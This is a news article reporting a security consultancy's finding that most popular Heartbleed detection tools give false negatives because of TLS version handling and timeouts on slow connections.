Skip to main content

Crisis deepens as research shows nearly all Heartbleed detection tools are failing

A cybersecurity consultancy has warned that tools designed to detect the Heartbleed vulnerability are flawed and will be unable to properly find the bug on affected websites.

The Heartbleed bug, which affects the most common security software used by sites, OpenSSL, has left hundreds of thousands of webpages scrambling to fix their security.

Read more: How worried should you really be about Heartbleed?

Following the panic, a surge of detection tools began to appear promising salvation, offering to help sites in discovering if their page had been affected.

According to London-based security consultancy Hut3, however, 95 per cent of the most popular of them are not reliable at all.

Most of the tools checked by Hut3 utilise detection code that is itself full of problematic bugs. Even the detection tools put out by big companies like McAfee and LastPass were found to be flawed.

"A lot of companies out there will be saying they've run the free web tool and they're fine, when they're not," Hut3's Edd Hardy told The Guardian. "There's absolute panic. We're getting calls late at night going 'can you test everything?'."

The main issue with the Heartbleed detectors is that most are only compatible with one version of OpenSSL: TLSv1.1. If the server being checked does not run TLSv1.1 it will either reject the connection or suggest another version.

The 95 per cent that are flawed, says Hut3, will be unable to register this suggestion and assume that a failed response means that the tested server is not vulnerable.

Related: Watch out for phishing emails about Heartbleed passwords

Another telling issue with the detection software, Hardy said, is that on slow Internet connections some tools would simply stop working. The server's response, being sluggish due to the connection, would be taken as a negative.

"It is yet another symptom of the 'hit the ground running' approach that has characterised the response to this vulnerability," said Rik Ferguson, vice president of security research at Trend Micro.